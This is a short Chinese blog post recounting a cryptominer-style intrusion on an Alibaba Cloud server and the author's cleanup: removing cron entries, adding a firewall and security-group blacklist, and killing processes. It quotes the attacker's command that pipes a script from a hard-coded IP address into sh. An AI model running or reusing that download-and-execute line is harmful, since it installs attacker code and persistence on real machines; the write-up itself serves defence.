记一次阿里云黑客攻击事件

这几天服务器一直发生异常行为，阿里云报警如下：

根据执行命令：/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道，后台某个进程一直从这个美国的IP地址下载sh可执行文件

访问这个地址：http://165.225.157.157:8000/i.sh

看到执行语句如下：

大概明白，意思是定时从这个地址获取sh可执行文件，然后添加到定时任务crontab，还生成了ddgs.3010文件不断后台执行。

So，第一步，查看crontab -l ，果然有

那么显而易见，执行：crontab -r 删除掉cron任务。

第二步，安装firewall，具体操作，参考我的另外一篇博客：https://blog.csdn.net/u012259256/article/details/61018892

限制固定的访问端口：

第三步，其实阿里云后台提供了安全组策略，可以完成防火墙的功能，而且更加方便配置，配置如下（并且把165.225.157.157加入黑名单，不允许访问）：

第四步，kill掉这些恶毒的进程，MD

用top命令，实时查看进程占用情况

（PS：因为进程已经被我kill掉，所以看不到数据啦）

没有kill之前，有一个恶意进程CPU占用198%，还有ddgs.3010进程，一直后台运行。总之，找到PID，然后kill就可以！

---------------------------------------------

总结：买了服务器一定记得先安装防火墙，或者设置安全策略！

Yeager